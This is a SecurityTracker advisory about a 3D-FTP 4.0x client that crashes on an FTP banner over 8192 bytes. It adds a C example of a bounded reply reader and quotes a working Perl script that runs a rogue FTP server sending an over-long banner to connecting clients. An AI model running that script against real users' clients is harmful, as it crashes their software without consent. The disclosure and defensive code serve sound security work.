SecurityTracker.com
SecurityTracker Archives

Category:   Application (File Transfer/Sharing)  >   3D-FTP
Vendors:   SiteDesigner Technologies, Inc.
3D-FTP Client Can Be Crashed By a Remote Server Sending a Long Banner
SecurityTracker Alert ID:  1006659
SecurityTracker URL:  http://securitytracker.com/id/1006659
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 28 2003
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 4.0x
Description:   A vulnerability was reported in the 3D-FTP FTP client software. A remote FTP server can cause the client to crash.

DWC Gr0up reported that a remote FTP server can send a long banner greater than 8192 bytes to the FTP client to cause the client to crash.

A demonstration exploit script is provided in the Source Message.

Impact:   A remote server can cause the client to crash when the client connects to the server.
Solution:   It is reported that version 6.0 is not affected. The new version is available at:

http://www.3dftp.com/download.htm

Vendor URL:  www.3dftp.com/
Cause:   Boundary error
Underlying OS:  Windows (Any)
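The boundary error described above, handled the way a hardened client would: an added example in C (not 3D-FTP's code and not the advisory author's) of a reply-line reader that refuses any banner line over 8192 bytes instead of overrunning its buffer, and that also rejects data which is not an RFC 959 reply. BANNER_MAX, read_banner_line and probe_fill are names chosen here; the "220 " prefix and the runs of "a" in probe_fill are constructed test input.

```c
#include <ctype.h>
#include <string.h>

/* Longest FTP reply line accepted. 8192 is the size the advisory reports the
 * 3D-FTP 4.0x client mishandled; this reader is an added illustration of a
 * bounded read, not 3D-FTP's own source. */
#define BANNER_MAX 8192

enum banner_status { BANNER_OK, BANNER_INCOMPLETE, BANNER_TOO_LONG, BANNER_BAD_FORMAT };

/* Parse one reply line from the bytes received so far. On BANNER_OK the line
 * (minus CRLF) is copied NUL-terminated into out[out_cap] and *consumed is the
 * number of input bytes used. Nothing is written past out_cap however much arrives. */
enum banner_status read_banner_line(const char *in, size_t in_len,
                                    char *out, size_t out_cap, size_t *consumed)
{
    /* A valid line is at most BANNER_MAX bytes plus CRLF; never scan further. */
    size_t i, limit = in_len < BANNER_MAX + 2 ? in_len : BANNER_MAX + 2;
    *consumed = 0;
    for (i = 0; i < limit; i++) {
        if (in[i] != '\n') continue;
        size_t n = (i > 0 && in[i - 1] == '\r') ? i - 1 : i;
        if (n > BANNER_MAX || n >= out_cap) return BANNER_TOO_LONG;
        /* RFC 959: three digits, then ' ' (final line) or '-' (continuation). */
        if (n < 4 || !isdigit((unsigned char)in[0]) || !isdigit((unsigned char)in[1]) ||
            !isdigit((unsigned char)in[2]) || (in[3] != ' ' && in[3] != '-'))
            return BANNER_BAD_FORMAT;
        memcpy(out, in, n);
        out[n] = '\0';
        *consumed = i + 1;
        return BANNER_OK;
    }
    /* No terminator in the window: with BANNER_MAX+2 bytes already buffered the
     * line can only end over-long (what the advisory's server sends); else wait. */
    return in_len >= BANNER_MAX + 2 ? BANNER_TOO_LONG : BANNER_INCOMPLETE;
}

static char last_line[BANNER_MAX + 1]; /* output of the most recent probe */
/* Feed a constructed reply of 'fill' payload bytes ("220 " then 'a's, fill >= 4),
 * with or without CRLF, and return the parser's verdict. Test helper only. */
enum banner_status probe_fill(size_t fill, int crlf)
{
    static char buf[BANNER_MAX + 8];
    size_t used, len = fill > BANNER_MAX + 4 ? BANNER_MAX + 4 : fill;
    memcpy(buf, "220 ", 4);
    memset(buf + 4, 'a', len - 4);
    if (crlf) { buf[len++] = '\r'; buf[len++] = '\n'; }
    return read_banner_line(buf, len, last_line, sizeof last_line, &used);
}
```

A line of exactly 8192 bytes is still accepted, so the check sits precisely on the boundary the advisory names rather than shrinking the legitimate limit.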

Message History:   None.


 Source Message Contents

Subject:  Buffer overflow in 3D-ftp


Product: 3D-ftp Client
Version: 4.0x
OffSite: http://www.sitegallery.net/
Problem: Remote buffer overflow
------------------------------------------

3D-ftp is a quite good Windows FTP client. The FTP client has many opportunities.

A remote buffer overflow will take place if the server sends a long banner >= 8192.
The client cannot process this data and crashes!

Fix: Download new version.

Sample exploit in Perl. To crash 3D-ftp use: ftpbanex.pl 8193

#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
#                by Over_G [DWC Gr0up]
#
#         www.dwcgr0up.com      www.overg.com
#########################################################
use strict;
use warnings;
use IO::Socket;

$| = 1;                    # flush status output immediately

my $port  = 21;            # standard FTP control port the client connects to
my $data  = "a";           # filler byte repeated to build the banner
my $bsize = $ARGV[0];      # banner length in bytes, taken from the command line

print "\n  Banner Buffer Overflow remote exploit in FTP Clients\n\n";
print "           by Over G[DWC Gr0up]\n";
print "     www.dwcgr0up.com www.overg.com\n\n";

unless (defined $bsize && $bsize =~ /^\d+$/) {
  print "Incorrect parameters.\n";
  die "Usage: perl ftpbanex.pl [buffer_size]\n";
}
print "Creating server...\n";
my $buf = $data x $bsize;  # the over-long banner, e.g. 8193 bytes of "a"

# Listen as an FTP server; the banner is sent as soon as a client connects.
my $server = IO::Socket::INET->new(
  LocalPort => $port,
  Type      => SOCK_STREAM,
  Reuse     => 1,
  Listen    => 2,
) or die "Couldn't create server.\n";
print "Awaiting connections...\n";
while (my $client = $server->accept()) {
  print "Client connected.\n";
  print "Attacking...";
  print $client $buf;      # sent without a "220 " code or CRLF, as in the original
  print "OK\n";
  close($client);
}

Greetz to: DHGroup, Gipshack.

www.overg.com www.dwcgr0up.com
regards, Over G[DWC Gr0up]

Copyright 2019, SecurityGlobal.net LLC